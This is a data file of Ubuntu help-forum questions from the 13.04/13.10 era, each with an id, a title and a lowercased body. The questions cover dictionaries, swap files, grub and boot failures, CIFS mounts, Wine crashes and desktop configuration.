375065	portuguese dictionary empty in ubuntu 13.10	i just installed the portuguese dictionary on ubuntu 13.10 but no application is able to use it . checking in the command line it seems this dictionary is empty : $ sudo aptitude search aspell-pt p aspell-pt - portuguese dictionaries for gnu aspell ( old package ) p aspell-pt-br - brazilian portuguese dictionary for gnu aspell i aspell-pt-pt - european portuguese dictionary for gnu aspell $ aspell dicts | grep pt pt_pt $ aspell -l pt_pt dump master $ could i be missing some package or is this a bug that should be reported ? since there 's no portuguese dictionary for libreoffice 4.1 , having one for aspell becomes indispensable . thanks . update : i installed the pt_br dictionary and it seems to be functional . the dump master command displays the full vocabulary . so this is only affecting the pt_pt dictionary , precisely the one i need .
375066	bash script to auto mkdir on usb	i 'm trying to have auto script to open dir on any removable device - different usb have different names and i want the user only to enter the device name since the path /media/user is a default in most os linux sys . here is the code : # ! /bin/bash f= `zenity -- entry` mkdir /media/user/ $ { f } /new+directory the interpreter does n't recognize the variable - any solution / suggestions ?
375072	dual boot not working ( windos 7 )	i have installed ubuntu and did the boot repair part too so as to show the options for booting both operating system but only ubuntu is opening by default http : //paste.ubuntu.com/6395053/
375073	php stat fails for files on a cifs ( smb ) mount	i 've recently upgraded from 13.04 to 13.10 , and i have a php script that checks files inside a cifs ( smb ) mount ( from an external hd connected to an apple airport extreme ) . problem is that any functions that relate to file stat stopped working . see this code : < ? php chdir ( `` /volumes/storage/test '' ) ; echo `` directory is writable : `` . is_writable ( `` . '' ) . `` \n '' ; echo `` writing a test file : `` . file_put_contents ( `` test.txt '' , 12345 ) . `` \n '' ; echo `` new file is readable : `` . is_readable ( `` test.txt '' ) . `` \n '' ; echo `` file size : `` . filesize ( `` test.txt '' ) . `` \n '' ; this is the result : directory is writable : 1 writing a test file : 5 new file is readable : 1 php warning : filesize ( ) : stat failed for test.txt in /var/www/tmp/test.php on line 8 php stack trace : php 1 . { main } ( ) /var/www/tmp/test.php:0 php 2. filesize ( ) /var/www/tmp/test.php:8 warning : filesize ( ) : stat failed for test.txt in /var/www/tmp/test.php on line 8 call stack : 0.0001 117672 1 . { main } ( ) /var/www/tmp/test.php:0 0.0380 117908 2. filesize ( ) /var/www/tmp/test.php:8 file size : all checks are okay , the file is written , but stat fails . php also fails to run php files from the mounted disk : 04:10 pm wesley at wsrv cwd /volumes/storage/test $ ll total 8 drwxr-xr-x 2 wesley computer 0 nov 10 16:10 ./ drwxr-xr-x 2 wesley computer 0 nov 10 16:10 ../ -rwxr-xr-x 0 wesley computer 255 nov 10 16:09 test.php* 04:10 pm wesley at wsrv cwd /volumes/storage/test $ php test.php php fatal error : unknown : failed opening required 'test.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear ' ) in unknown on line 0 fatal error : unknown : failed opening required 'test.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear ' ) in unknown on line 0 this is the mount line from fstab : //10.0.0.1/storage /volumes/storage cifs uid=1000 , gid=1000 , user=wesley , password=redacted , rw , hard , nosetuids , noperm , sec=ntlm 0 0
375074	wubi install : how to increase swap size	i am trying to increase the swapfile size on my wubi install . i followed the answer here : sudo su swapoff -a cd /host/ubuntu/disks/ mv swap.disk swap.disk.bak dd if=/dev/zero of=swap.disk bs=1024 count=2097152 mkswap swap.disk swapon -a free -m until i reached : mv swap.disk swap.disk.bak at which point i have got got the following : root @ ubuntu : /host/ubuntu/disks # mv swap.disk swap.disk.bak mv : can not move `swap.disk ' to `swap.disk.bak ' : operation not permitted my 256 m swap space is all used up . i would like to install a total of twice that . is there a method of setting it which would not include guesswork on my part ? i followed bcbc below and now i get an error : swapon -a swapon : /host/ubuntu/disks/swap.disk : read swap header failed : invalid argument â /etc/fstab looks like : unconfigured fstab for base system /host/ubuntu/disks/swap.disk none swap sw 0 0 fixed . ( have to be sure to allow all processes to finish ; this takes several minutes . ) thx
375077	network devices unmanaged after resume from hibernation in ubuntu gnome 13.10	after confirmation that hibernation/resume worked well with sudo pm-hibernate , i enabled hibernatation on /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla to get the option in the session menu . unfortunately , every time i hibernate this way , the network devices are all set to unmanaged and i have to reboot to get them work again . strangely , this problem does n't happen when i use the command sudo pm-hibernate or when i just suspend . does the hibernate menu item use a different command than pm-hibernate ? or maybe with different options ? how can i make it work properly ?
375078	mount \root\dev failed	have read fixes to this like load your live cd except i tried this but screen goes black and loads with mount : \dev \root\dev failed will not try to read cd goes straight to \bin\sh . now have \root\dev\console : no such file . can not get to command line to do any sudo commands . will not leave /bin/sh screen . what is my issue with this system ? thx
375080	tor browser bundle not running	i 'm using ubuntu 13.10.i have installed vidalia and tor browser but when i click on vidalia nothing happens.no icon in the tray nor any firefox pop up but vidalia appears to be running ( shown in the system monitor ) . i have downloaded tor browser bundle and extracted it then ran the start-tor-browser file but nothing happens.what i 'm missing ? i made a video uploaded to youtube please have a look https : //www.youtube.com/watch ? v=ut3c7mkuhde
375083	hybrid_boot_options intramfs script errors ( hybrid graphics )	i have a laptop with hybrid graphics and i want to use just the integrated vga to reduce heating and power consumption . i followed the instructions here to do that , however , although the laptop is using the integrated vga upon start up , the dedicated vga is also on , an its fans are running . before ubuntu starts up , i get the following error messages : switching hybrid graphics to on /scripts/local-top/hybrid_boot_options : line 62 : ca n't create /sys/kernel/debug/vgaswitcheroo/switch : nonexistent directory switching hybrid graphics to igd /scripts/local-top/hybrid_boot_options : line 62 : ca n't create /sys/kernel/debug/vgaswitcheroo/switch : nonexistent directory switching hybrid graphics to off /scripts/local-top/hybrid_boot_options : line 62 : ca n't create /sys/kernel/debug/vgaswitcheroo/switch : nonexistent directory the script i use is identical to the one on the instruction page linked above . what can i do to fix this ?
375085	how to fix system program problems	i am using ubuntu 13.10 64-bit and whenever i log in i am greeted with 6 system program problem windows and i do n't know how to fix them . in the 3 weeks ago running sudo apt-get update & & sudo apt-get upgrade this fixed the problem for a week and i ca n't figure out how to find and fix the problems . i am not a terminal expert , so if anyone can five me some useful commands or tips please post it below . thanks to the entire ubuntu community , i have had so many answers to my problems .
375088	instaling utorrent : no such file or directory	i constantly get this error , any ideas ? rainmaker @ rain : ~/downloads $ sudo tar xvzf utorrent-server-3.0-25053.tar.gz -c /opt tar : /opt : can not open : no such file or directory tar : error is not recoverable : exiting now
375089	go back to windows ?	ok so heres my problem ... when i installed ubuntu i encrypted everything for security reasons but now i need to switch back to windows and i cant boot from cd or when i boot the cd in wine it says ... windows setup can not find a location to store temporary installation files . to install windows , make sure that partition on your boot disk has at least 683 megabytes ( mb ) of free space . error code : 0x80070490
375090	shell script wo n't execute in .config/autostart	i have a simple shell scrip i am trying to get to execute on startup . i use gnome-sessions-properties to add it to autostart , but nothing is happening when i start up . i am able to manually execute the shell with ./script with no problems . my script : # ! /bin/bash xbmc -- standalone -- -nocusrsor & status=0 while [ $ status -eq 0 ] do sleep 1 status= $ ( wmctrl -l | grep `` xbmc media center '' | wc -l | awk ' { print $ 1 } ' ) done wmctrl -r xbmc media center -b toggle , fullscreen in .config/autostart there is a file called script.sh.desktop [ desktop entry ] type=application exec=/home/xbmc/admin/script.sh hidden=false nodisplay=false x-gnome-autostart-enabled=true name [ en_us ] =xbmc toggle fs name=xbmc toggle fs comment [ en_us ] = comment= from what i could find , it seems to be correct ... but just not working . any help is appreciated !
375094	what is the best way to add a new user using the command line ?	i am familiar with the useradd and adduser commands but if i create a new user using any of them it ca n't log into the gui ? ! does this mean i am forced to use the gui for adding a new user when the system is gui-based ?
375096	how to automate my startup ?	i am not sure how i am supposed to automate such delicate tasks on my daily routine . let me describe it : open sublime text in first desktop open chrome in second open two terminal windows in third , align them vertically and run a set of different command on each open terminal window in fourth screen i am efficient handling this manually quickly but some days i just have to restart my box a few times and would like to have some script which would automate the task . my question may consist of several parts : how do i imitate keystrokes ( move to align windows ) how do i open multiple terminal windows most important - what kind of tool to use ? i hope i am able to do that with bash but i am not very efficient with it .
375098	unable to install ubuntu 13.10 on dell xps 15 l502x.. operating system not found	i have windows 8 installed on my laptop . i own a dell xps 15 l502x laptop . i am trying to install ubuntu using usb but whenever i try rebooting my laptop to start the installation , there 's an error `` operating system not found '' . laptop is unable to find os on my usb . thanks in advance .
375100	i am trying to set up ubuntu as an ide for c++	i do n't really know how to phrase it , but i am not looking to use an actual ide ( codeblocks , netbeans , eclipse , etc ) . i have tried to follow several different tutorials , but things keep getting screwed up along the way and nothing ever quite fits as it is supposed to . https : //earthserver.com/setting_up_a_c % 2b % 2b11_development_environment_on_linux_with_clang_and_emacs the above link is essentially what i want to do , but there is next to no trouble-shooting for when something goes wrong . can someone please point me in a dummy proof direction so i can get started ? i am willing to learn but am not getting anywhere after nearly two weeks of hitting road blocks . i am currently running ubuntu 13.10 64bit . i am on a fresh install , so i ca n't imagine anything would be screwed up right now .
375102	ca n't start carbon - 12.04 - python error	i am really hoping someone can help me as i have spent at-least 15 hours trying to fix this problem . i have been given a task by a potential employer and my solution is to use graphite/carbon/collected . i am trying to run and install carbon / graphite 0.9.12 but i simply ca n't get carbon to start . every time i try and start carbon i end up with the following error . i do n't really know python so would appreciate any help you can provide . /etc/rc0.d/k20carbon-cache - > ../init.d/carbon-cache /etc/rc1.d/k20carbon-cache - > ../init.d/carbon-cache /etc/rc6.d/k20carbon-cache - > ../init.d/carbon-cache /etc/rc2.d/s20carbon-cache - > ../init.d/carbon-cache /etc/rc3.d/s20carbon-cache - > ../init.d/carbon-cache /etc/rc4.d/s20carbon-cache - > ../init.d/carbon-cache /etc/rc5.d/s20carbon-cache - > ../init.d/carbon-cache traceback ( most recent call last ) : file `` /opt/graphite/bin/carbon-cache.py '' , line 28 , in < module > from carbon.util import run_twistd_plugin file `` /opt/graphite/lib/carbon/util.py '' , line 21 , in < module > from twisted.scripts._twistd_unix import daemonize importerror : can not import name daemonize thanks
375104	remote with dvb tuner - shows up in evtest but not showkey	trying to get an ir remote as part of a dvb tuner ( avermedia a835 ) to control my music ( i do n't care about the tv part ) . i 'm running kubuntu 13.10 on a thinkpad t400 . it shows up in lsusb fine bus 001 device 017 : id 07ca : a835 avermedia technologies , inc. and in /proc/bus/input/devices i : bus=0003 vendor=07ca product=a835 version=0203 n : name= '' avermedia avertv volar hd/pro ( a835 ) '' p : phys=usb-0000:00:1a.7-1/ir0 s : sysfs=/devices/pci0000:00/0000:00:1a.7/usb1/1-1/rc/rc3/input20 u : uniq= h : handlers=kbd event16 b : prop=0 b : ev=100013 b : key=1000000 0 0 b : msc=10 and in evtest /dev/input/event16 : avermedia avertv volar hd/pro ( a835 ) select the device event number [ 0-16 ] : 16 input driver version is 1.0.1 input device id : bus 0x3 vendor 0x7ca product 0xa835 version 0x203 input device name : `` avermedia avertv volar hd/pro ( a835 ) '' supported events : event type 0 ( ev_syn ) event type 1 ( ev_key ) event code 152 ( key_screenlock ) event type 4 ( ev_msc ) event code 4 ( msc_scan ) properties : property type 20 ( ev_rep ) property code 0 ( rep_delay ) value 500 property code 1 ( rep_period ) value 125 testing ... ( interrupt to exit ) event : time 1384113890.257478 , type 4 ( ev_msc ) , code 4 ( msc_scan ) , value 516 event : time 1384113890.257478 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1384113890.757480 , type 4 ( ev_msc ) , code 4 ( msc_scan ) , value 516 event : time 1384113890.757480 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- but when i run showkey -s , i do n't get any scancodes . do i have to tell showkey where to look ? configure something to listen to event16 rather than my keyboard or whatever ? what have i done wrong ? thanks !
375105	ubuntu 13.10 wo n't boot - kmv : dissabled by bios - dell inspiron 1720	to introduce myself , i am not 100 % technologically minded but i have been using ubuntu for around 3 years in total and i 've never had any real issues . i regularly install the recommended updates from ubuntu but since the latest update i have not been able to boot my dell inspiron 1720 laptop . i have tried to boot from a usb and boot in recovery mode from the grub menu but i can not seem to get my machine to boot . when i boot the laptop i get the dell bios screen , i get the ubuntu splash screen with 5 dots then nvida flashes up ( which has never happened before ) and the boot sticks on a blank screen . i do n't know what further details i could provide but please let me know if there is any way i could help you help me . i would be very appreciative of any help you can give .
375106	ubuntu 13.10 x64 steamcmd	i 'm guessing that this question may of been asked before ; however , i 'm having trouble finding an answer . i 'm currently reviewing dependencies for all the game server scripts i have written ( http : //danielgibbs.co.uk/scripts ) . there has been a big change with 13.10 with regards to 32-bit software vs. 64-bit versions of ubuntu . previously you would install ia32-libs and steamcmd would work . however , this is now deprecated , and i am having difficulty getting steamcmd working . does anyone know the best way to get steamcmd up and running on a 64-bit system without needing ia32-libs ?
375108	ubuntu 13.10 : wpa_supplicant crashes on login	every time i log in , and sometimes multiple times in a row , i get a error message . i do n't seem to have any problems with the functionality of my computer . i 'm running ubuntu 13.10 on a google pixel , has a qualcomm atheros ar9462 wireless network adapter ( not sure if that will matter here ) . screenshot of error details
375109	how to remove this ? ? and fix grub .	hi i install the ubuntu with wubi , i fix the problem hdd 0,0 no wubidl but now i have for 1second this hdd 0,0 error prefix is not set and system booting how to remove this ? i know this is only text and nothing do but i do n't like see error . and ubuntu/disk/boot/grub is empty ? . i do n't have any menu to boot only this error and ubuntu start .
375111	problem with installing flash	this question has been posted loads of times , i know , but seriously i 've spent hours and hours searching the web for answers . anyways , basically i have just installed ubuntu 13.04 for the first time . i tried to get on youtube and found out i can not play videos . when i went to install flash the windows popped up saying either install adobe flash or gnash . installed flash from the adobe website . three different files types to choose from . yum , .tar.gz or .rpm . now from what i could gather .tar.gz is the right one so i tried it and it downloaded without the error message . it comes up with the box that says open with archive manager . extracted the files but none of them were of any use . could not work out how to install it . there was no file intended for installation . so what am i meant to do with these files ? would it be easier to just install gnash ?
375113	problem installing ubuntu with already installed win 7	i am newbee in using ubuntu . i have my dell 2520 laptop with installed win7 64 bit os . it has 156gb of unallocated space . while i am trying to install ubuntu 13.10 it is not showing the harddisk partitions rather it is showing the whole hard disk is unallocated . i am facing a big problem as i need dual boot os . i followed up the installation procedure from the website . please help me how can i see the harddisk parttion and install ubuntu without removing the win7 . thanks in advance .
375115	modem huawei e122	how i can use this modem on ubuntu 13.04 ? search on google , but did n't understand they said.. does n't exist a program with autoconnection with any type of modem ?
375116	no such device = grub rescue 13.10	noob here . i just installed 13.10 yesterday and it booted up for me several times and all was well . then this morning when i went to boot i received a `` no such device '' error and a `` grub rescue '' command line prompt . i tried running the live disc and re-installing ubuntu 13.10 however that was a fail . the same messages kept occurring . then i tried to boot up in windows 7 . also a fail . i then attempted to run a windows 7 restore disc . you guessed it - fail . this sucks . what do i do ?
375117	partitions are gone after installing ubuntu 13.10	i have installed ubuntu 13.10 today . i selected it to overwrite my windows 7 operating system . however , after booting up ubuntu i saw that my partitions are gone and all the space is showing up us in one partition . why is this happening ? have i done something wrong while choosing to overwrite windows 7 ? i understand that while overwriting windows 7 it will format my c : drive there , but why my other partitions are gone ? is there any way that i can get my data back ?
375118	how do you add application detailed information to display in the dash ?	there is plenty of information about creating a launcher for the unity dash . no problems there . however when you right-click on an application , it is possible for the dash to display much more detailed information about the program . how can i do this with a custom launcher ? i have created several .desktop files and they work perfectly , but i have several very similar versions and want to be able to right-click and get more information about the specifics of each launcher . is this possible in ubuntu ?
375119	lubuntu 13.04 : ca n't find catfish in the menu	i do n't seem to have any earch options in thunar . so i went to the software center and searched for catfish . i found it and says its already installed ! the softeware center says i must look in menu- > accesories- > catfish file search , but it 's not there . what can i do ? how do i find it and integrate it in thunar ?
375120	real-time search in terminal output stream ; after running a command	sometimes i want to search specific string in terminal after running a command . for example , i run apt-get upgrade and i see outputs in terminal line by line : unpacking replacement procps ... preparing to replace apt-transport-https 0.8.16~exp12ubuntu10.12 ( using ... /apt-transport-https_0.8.16~exp12ubuntu10.15_amd64.deb ) ... unpacking replacement apt-transport-https ... preparing to replace dosfstools 3.0.12-1ubuntu1 ( using ... /dosfstools_3.0.12-1ubuntu1.1_amd64.deb ) ... unpacking replacement dosfstools ... preparing to replace python-problem-report 2.0.1-0ubuntu17.4 ( using ... /python-problem-report_2.0.1-0ubuntu17.6_all.deb ) ... unpacking replacement python-problem-report ... preparing to replace python-apport 2.0.1-0ubuntu17.4 ( using ... /python-apport_2.0.1-0ubuntu17.6_all.deb ) ... and it goes on . is there a way i search dosfstools string , right now ; with shortcut or something else ? i know : easy way is , select the text in terminal and copy that to text editor and search for string . but if i do that more and more times , it makes me : -/
375124	how can i read kindle book under xfce ( ubuntu ) ? ( using chromebook ) ( wine not working )	i 'm using chromebook , dual booting xfce ( ubuntu ) and cr os . the ebook i bought on amazon is not supported on kindle cloud reader . ( under xfce ) i downloaded wine and tried installing kindle for pc under wine , and after couples of times of trials , it always said installation error and could not install kindle , and it 's been giving me : unhandled exception : unimplemented function msvcp90.dll. ? ? 0 ? $ basic_ofstream @ du ? $ char_traits @ d @ std @ @ @ std @ @ qae @ xz called in 32-bit code ( 0x7b839cf2 ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:7b839cf2 esp:0033fcd4 ebp:0033fd38 eflags:00000287 ( - -- i s - -p-c ) eax:7b826245 ebx:7b894ff4 ecx:00000008 edx:0033fcf4 esi:80000100 edi:00dca568 stack dump : 0x0033fcd4 : 0033fd58 00000008 00000030 80000100 0x0033fce4 : 00000001 00000000 7b839cf2 00000002 0x0033fcf4 : 7e24b340 7e24f2ca 0000000d 00110000 0x0033fd04 : 7bc47a0d 7e1dbff4 7e1417f0 00dca568 0x0033fd14 : 0033fd24 7bc65d0b 00110000 00000000 0x0033fd24 : 0033fd44 7e141801 7b839caa 7e1dbff4 000c : sel=0067 base=00000000 limit=00000000 16-bit r-x backtrace : = > 0 0x7b839cf2 in kernel32 ( +0x29cf2 ) ( 0x0033fd38 ) 1 0x7e24b2a8 in msvcp90 ( +0x3b2a7 ) ( 0x0033fd68 ) 2 0x7e216c9d in msvcp90 ( +0x6c9c ) ( 0x0033fde8 ) 3 0x00938fdd in kindle ( +0x538fdc ) ( 0x0033fde8 ) 4 0x0089dc71 in kindle ( +0x49dc70 ) ( 0x0033fe70 ) 5 0x7b859cdc call_process_entry+0xb ( ) in kernel32 ( 0x0033fe88 ) 6 0x7b85af4f in kernel32 ( +0x4af4e ) ( 0x0033fec8 ) 7 0x7bc71db0 call_thread_func_wrapper+0xb ( ) in ntdll ( 0x0033fed8 ) 8 0x7bc7486d call_thread_func+0x7c ( ) in ntdll ( 0x0033ffa8 ) 9 0x7bc71d8e rtlraiseexception+0x21 ( ) in ntdll ( 0x0033ffc8 ) 10 0x7bc49f4e call_dll_entry_point+0x61d ( ) in ntdll ( 0x0033ffe8 ) 0x7b839cf2 : subl $ 4 , % esp modules : module address debug info name ( 130 modules ) pe 340000- 37d000 deferred ssleay32 pe 390000- 3ca000 deferred webcoreviewer pe 3d0000- 3e0000 deferred pthreadvc2 pe 400000- 1433000 export kindle pe 1440000- 155c000 deferred libeay32 pe 1560000- 169f000 deferred qtscript4 pe 16a0000- 1795000 deferred libxml2 pe 17a0000- 18c7000 deferred javascriptcore pe 18d0000- 1974000 deferred cflite pe 1980000- 2048000 deferred libwebcore pe 2050000- 208d000 deferred libjpeg pe 10000000-10a34000 deferred qtwebkit4 pe 4a800000-4a8eb000 deferred icuuc46 pe 4a900000-4aa36000 deferred icuin46 pe 4ad00000-4bb80000 deferred icudt46 pe 5a4c0000-5a4d4000 deferred zlib1 pe 61000000-61056000 deferred qtxml4 pe 62000000-62093000 deferred qtsql4 pe 64000000-640ef000 deferred qtnetwork4 pe 65000000-657b8000 deferred qtgui4 pe 67000000-67228000 deferred qtcore4 pe 78050000-780b9000 deferred msvcp100 pe 78aa0000-78b5e000 deferred msvcr100 elf 7b800000-7ba15000 dwarf kernel32 < elf > \-pe 7b810000-7ba15000 \ kernel32 elf 7bc00000-7bcc3000 dwarf ntdll < elf > \-pe 7bc10000-7bcc3000 \ ntdll elf 7bf00000-7bf04000 deferred < wine-loader > elf 7d7f7000-7d800000 deferred librt.so.1 elf 7d800000-7d818000 deferred libresolv.so.2 elf 7d818000-7d861000 deferred libdbus-1.so.3 elf 7d861000-7d873000 deferred libp11-kit.so.0 elf 7d873000-7d8f8000 deferred libgcrypt.so.11 elf 7d8f8000-7d90a000 deferred libtasn1.so.3 elf 7d90a000-7d913000 deferred libkrb5support.so.0 elf 7d913000-7d9e2000 deferred libkrb5.so.3 elf 7da42000-7da47000 deferred libgpg-error.so.0 elf 7da47000-7da6f000 deferred libk5crypto.so.3 elf 7da6f000-7da81000 deferred libavahi-client.so.3 elf 7da81000-7da8f000 deferred libavahi-common.so.3 elf 7da8f000-7db53000 deferred libgnutls.so.26 elf 7db53000-7db91000 deferred libgssapi_krb5.so.2 elf 7db91000-7dbe4000 deferred libcups.so.2 elf 7dc21000-7dc55000 deferred uxtheme < elf > \-pe 7dc30000-7dc55000 \ uxtheme elf 7dc55000-7dc5b000 deferred libxfixes.so.3 elf 7dc5b000-7dc66000 deferred libxcursor.so.1 elf 7dc6a000-7dc6e000 deferred libkeyutils.so.1 elf 7dc6e000-7dc73000 deferred libcom_err.so.2 elf 7dca5000-7dccf000 deferred libexpat.so.1 elf 7dccf000-7dd03000 deferred libfontconfig.so.1 elf 7dd03000-7dd13000 deferred libxi.so.6 elf 7dd13000-7dd17000 deferred libxcomposite.so.1 elf 7dd17000-7dd20000 deferred libxrandr.so.2 elf 7dd20000-7dd2a000 deferred libxrender.so.1 elf 7dd2a000-7dd30000 deferred libxxf86vm.so.1 elf 7dd30000-7dd34000 deferred libxinerama.so.1 elf 7dd34000-7dd3b000 deferred libxdmcp.so.6 elf 7dd3b000-7dd5c000 deferred libxcb.so.1 elf 7dd5c000-7dd76000 deferred libice.so.6 elf 7dd76000-7deaa000 deferred libx11.so.6 elf 7deaa000-7debc000 deferred libxext.so.6 elf 7debc000-7dec5000 deferred libsm.so.6 elf 7ded4000-7df67000 deferred winex11 < elf > \-pe 7dee0000-7df67000 \ winex11 elf 7df67000-7e001000 deferred libfreetype.so.6 elf 7e001000-7e023000 deferred iphlpapi < elf > \-pe 7e010000-7e023000 \ iphlpapi elf 7e023000-7e03e000 deferred wsock32 < elf > \-pe 7e030000-7e03e000 \ wsock32 elf 7e03e000-7e071000 deferred wintrust < elf > \-pe 7e040000-7e071000 \ wintrust elf 7e071000-7e129000 deferred crypt32 < elf > \-pe 7e080000-7e129000 \ crypt32 elf 7e129000-7e158000 deferred msvcr90 < elf > \-pe 7e130000-7e158000 \ msvcr90 elf 7e158000-7e1e5000 deferred msvcrt < elf > \-pe 7e170000-7e1e5000 \ msvcrt elf 7e1e5000-7e2ca000 dwarf msvcp90 < elf > \-pe 7e210000-7e2ca000 \ msvcp90 elf 7e2ca000-7e2ec000 deferred imm32 < elf > \-pe 7e2d0000-7e2ec000 \ imm32 elf 7e2ec000-7e3de000 deferred oleaut32 < elf > \-pe 7e300000-7e3de000 \ oleaut32 elf 7e3de000-7e418000 deferred winspool < elf > \-pe 7e3f0000-7e418000 \ winspool elf 7e418000-7e4f7000 deferred comdlg32 < elf > \-pe 7e420000-7e4f7000 \ comdlg32 elf 7e4f7000-7e51f000 deferred msacm32 < elf > \-pe 7e500000-7e51f000 \ msacm32 elf 7e51f000-7e5cc000 deferred winmm < elf > \-pe 7e530000-7e5cc000 \ winmm elf 7e5cc000-7e641000 deferred rpcrt4 < elf > \-pe 7e5e0000-7e641000 \ rpcrt4 elf 7e641000-7e749000 deferred ole32 < elf > \-pe 7e660000-7e749000 \ ole32 elf 7e749000-7e841000 deferred comctl32 < elf > \-pe 7e750000-7e841000 \ comctl32 elf 7e841000-7ea52000 deferred shell32 < elf > \-pe 7e850000-7ea52000 \ shell32 elf 7ea52000-7eabc000 deferred shlwapi < elf > \-pe 7ea60000-7eabc000 \ shlwapi elf 7eabc000-7ead5000 deferred version < elf > \-pe 7eac0000-7ead5000 \ version elf 7ead5000-7eb35000 deferred advapi32 < elf > \-pe 7eae0000-7eb35000 \ advapi32 elf 7eb35000-7ebf2000 deferred gdi32 < elf > \-pe 7eb40000-7ebf2000 \ gdi32 elf 7ebf2000-7ed32000 deferred user32 < elf > \-pe 7ec00000-7ed32000 \ user32 elf 7ed32000-7ed58000 deferred mpr < elf > \-pe 7ed40000-7ed58000 \ mpr elf 7ed58000-7ed6e000 deferred libz.so.1 elf 7ed6e000-7eddd000 deferred wininet < elf > \-pe 7ed80000-7eddd000 \ wininet elf 7eddd000-7ee0f000 deferred ws2_32 < elf > \-pe 7ede0000-7ee0f000 \ ws2_32 elf 7ee0f000-7ee1c000 deferred libnss_files.so.2 elf 7ee1c000-7ee28000 deferred libnss_nis.so.2 elf 7ee28000-7ee42000 deferred libnsl.so.1 elf 7ee42000-7ee4b000 deferred libnss_compat.so.2 elf 7efd4000-7f000000 deferred libm.so.6 elf f74a3000-f74a7000 deferred libxau.so.6 elf f74a8000-f74ad000 deferred libdl.so.2 elf f74ad000-f7657000 deferred libc.so.6 elf f7658000-f7673000 deferred libpthread.so.0 elf f7675000-f767b000 deferred libuuid.so.1 elf f7682000-f77c4000 dwarf libwine.so.1 elf f77c6000-f77e8000 deferred ld-linux.so.2 elf f77e8000-f77e9000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 0000001f 0 0000001e 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001c 0 00000019 0 00000014 0 00000013 0 0000001a plugplay.exe 00000020 0 0000001d 0 0000001b 0 00000037 explorer.exe 00000038 0 00000042 ( d ) c : \program files ( x86 ) \amazon\kindle\kindle.exe 00000043 0 < == system information : wine build : wine-1.4 platform : i386 ( wow64 ) host system : linux host version : 3.8.11 how can this be fixed ?
375128	adt installation ubuntu 13.10	it 's been a while.. i just installed ubuntu 13.10 on my hp sleekbook 14 . it is working fine . now i wanted to install adt on it for android app development . i downloaded the package from the official android site . but i can not open eclipse . the file 'eclipse ' wo n't open . i saw a tutorial for linux mint/ubuntu that said i could double click the file and eclipse will initiate . this one is not doing anything but asking me what software to open the file with . the adt i downloaded was adt-bundle-linux-x86_64-20131030 one other thing , not that i expect it to have anything to do with this , i compiled in a 3.12.x kernel , it is the one running now ... as opposed to the stock 3.11.x any ideas would be greatly appreciated ! ; )
375130	how to unlock applications folder	this question relates to ubuntu 12.04 lts . i wish to move a folder from the desktop into the applications folder at /home/usr/share/applications . when i attempt to drag the folder from the desktop to the applications folder , i get the following message : '' error moving file : permission denied '' permission or no permission , i want to move a folder from the desktop to the above said applications folder . how do i authenticate so i can make this move ? there is no opportunity to authenticate when i get the error message , only `` skip '' or `` cancel '' . i do n't want to skip or cancel , i want to authenticate and move the folder . how do i do this ? on top of things , when i try to use pcmanfm and attempt to open the applications folder as root , i get the error message : `` switch user command not set '' . what do i do now ? thanx !
375132	how move stock launcher bar from left to bottom	i install ubuntu 13.10 and i want to move bar to bottom of screen . it 's some way to do that ?
375133	i have an hp pavilion dv6 a1u58av and the headphone jack does not work	whenever i plug a set of headphones or an aux cable into the headphones jack the computers speakers turn off , but no audio comes out of the headphones or the aux cable .
375144	how to create a custom keyboardlayout that works in all applications	i created a custom keyboardlayout coffee++ for linux that works fine in most apps : http : //coffeeplusplus.z11.de/phpbb3/viewtopic.php ? f=6 & t=13 & p=34 # p34 i created a debian package , that adds the needed changes to the keyboard configuration and creates a shell script which which you can swap between normal qwerty and coffee++ the letters all work fine , only the arrow-combinations , for ex . altgr+j for `` arrow-left '' and so on do n't work in all applications . how can i make the arrow-key-combinations work in all apps ?
375146	ubuntu unity 13.04/13.10 systray no longer present	from what i can tell , a decision was made to remove the systray from 13.04/13.10 . i managed to get it re-enabled on my upgrade for now . what i am not able to find , is the replacement solution for that functionality . is it just gone , or is there some new solution / application to obtain that functionality ? -mike .
375147	root issues in softwarecenter , synaptic and update manager	i have a notebook samsung ativ 2 and ubuntu 12.04 precise , cinnamon desktop . after logging in today my update manager , synaptic and ubuntu softwarecenter stopped working . synaptic i can only launch from terminal the others from panel.when choosing to update , nothing happens . same thing when trying to install programms from syn . or softw.center.when launching softwarec . from terminal i get : marcus @ ddddddddd : ~ $ software-center 2013-11-10 22:30:46,206 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-11-10 22:30:46,217 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true ( software-center:4772 ) : gtk-warning ** : theme parsing error : softwarecenter.css:34:20 : not using units is deprecated . assuming 'px ' . ( software-center:4772 ) : gtk-warning ** : theme parsing error : softwarecenter.css:34:22 : not using units is deprecated . assuming 'px ' . ( software-center:4772 ) : gtk-warning ** : theme parsing error : softwarecenter.css:56:20 : not using units is deprecated . assuming 'px ' . ( software-center:4772 ) : gtk-warning ** : theme parsing error : softwarecenter.css:56:22 : not using units is deprecated . assuming 'px ' . ( software-center:4772 ) : gtk-warning ** : theme parsing error : softwarecenter.css:60:20 : not using units is deprecated . assuming 'px ' . ( software-center:4772 ) : gtk-warning ** : theme parsing error : softwarecenter.css:60:22 : not using units is deprecated . assuming 'px ' . 2013-11-10 22:30:46,977 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-11-10 22:30:47,320 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-11-10 22:30:48,057 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-11-10 22:31:00,646 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/utils.py ' , 201 , 'get_title_from_html ' ) ' 2013-11-10 22:31:00,645 - root - warning - failed to parse : ' < div style= '' background-color : # 161513 ; width:1680px ; height:200px ; '' > â < div style= '' background : url ( '/site_media/exhibits/2013/09/aamfp_leaderboard_700x200_1.jpg ' ) top left no-repeat ; width:700px ; height:200px ; '' > < /div > < /div > ' ( 'ascii ' codec ca n't encode character u'\xa0 ' in position 70 : ordinal not 